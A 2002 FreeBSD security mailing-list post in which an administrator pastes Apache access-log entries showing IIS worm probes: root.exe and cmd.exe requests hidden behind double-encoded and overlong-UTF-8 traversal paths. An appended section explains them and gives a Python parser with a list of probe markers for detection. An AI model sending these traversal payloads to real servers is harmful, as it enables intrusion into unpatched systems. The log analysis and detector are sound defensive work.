From: "William J. Borskey"
To: freebsd-security@freebsd.org
Subject: weird server activity
Date: Sat, 26 Jan 2002 09:13:12 -0800

I am running FreeBSD 4.4. I use Apache-fp and openssh. About a week ago my system went down and I wasn't able to log in or look at any web pages. I could connect, but it would not spawn a process to log me in, or serve me a web document. I got someone to reboot the machine from the console, I was then able to log into the machine. Starting processes was slow but top reports normal system loads. Then after about an hour the machine would no longer run any processes and quickly shut me out by killing the sshd I was connected with. I did get a chance to look at some of my logs, not all unfortunately.
The httpd-access file had some weird sequences of windows sounding paths, but it wasn't code red or anything like code red:

147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:58 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:12:59 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:00 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:01 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET "-"
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:05 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"
147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200
147.46.54.38 - - [19/Jan/2002:15:13:06 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 200 "-" "-"

I haven't been able to look at any other logs and I doubt that that has anything to do with it.

William Borskey
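The request paths in the post (root.exe, cmd.exe, and the %255c / %c0%af style traversal encodings) are the well-known signature of IIS-targeting worm probes, which an Apache server answers with 404 or 400 and is not affected by. Added example, not part of the original post: a small Python parser for these access-log lines that counts the probes per source, reports any probe that was not answered with a 4xx (the only case worth a second look), and tolerates truncated entries like the one in the post; the sample lines are constructed from the post.

```python
import re
from collections import Counter

# Apache common log format; the trailing referer/user-agent fields seen on every second line are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Request fragments characteristic of the IIS worm probes shown in the post.
PROBE_MARKERS = (
    "root.exe", "cmd.exe",                      # backdoor / shell checks
    "%255c", "%252f",                           # double-encoded \ and /
    "%c0%af", "%c0%2f", "%c1%1c", "%c1%9c",     # overlong UTF-8 traversal
    "%%35%63", "%%35c", "%25%35%63",            # further encodings of \
)

def parse_line(line):
    """Parse one access-log line; return a dict, or None if it is malformed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def is_iis_probe(request):
    req = request.lower()
    return any(marker in req for marker in PROBE_MARKERS)

def summarize(lines):
    """Return (probe count per source IP, probes not answered 4xx, unparsed count)."""
    per_ip = Counter()
    served = []  # a probe answered with anything but 4xx deserves a closer look
    unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
        elif is_iis_probe(rec["req"]):
            per_ip[rec["ip"]] += 1
            if not 400 <= rec["status"] < 500:
                served.append(rec)
    return per_ip, served, unparsed

# Constructed sample: two lines modelled on the post, the truncated entry, and one normal hit.
SAMPLE = [
    '147.46.54.38 - - [19/Jan/2002:15:12:57 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 200',
    '147.46.54.38 - - [19/Jan/2002:15:13:04 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"',
    '147.46.54.38 - - [19/Jan/2002:15:13:03 -0600] "GET "-"',
    '10.0.0.5 - - [19/Jan/2002:15:20:00 -0600] "GET /index.html HTTP/1.0" 200 1532',
]
```

Feed it the real httpd-access file line by line; a non-empty second element of the result is the only output that would connect these requests to the server's behaviour.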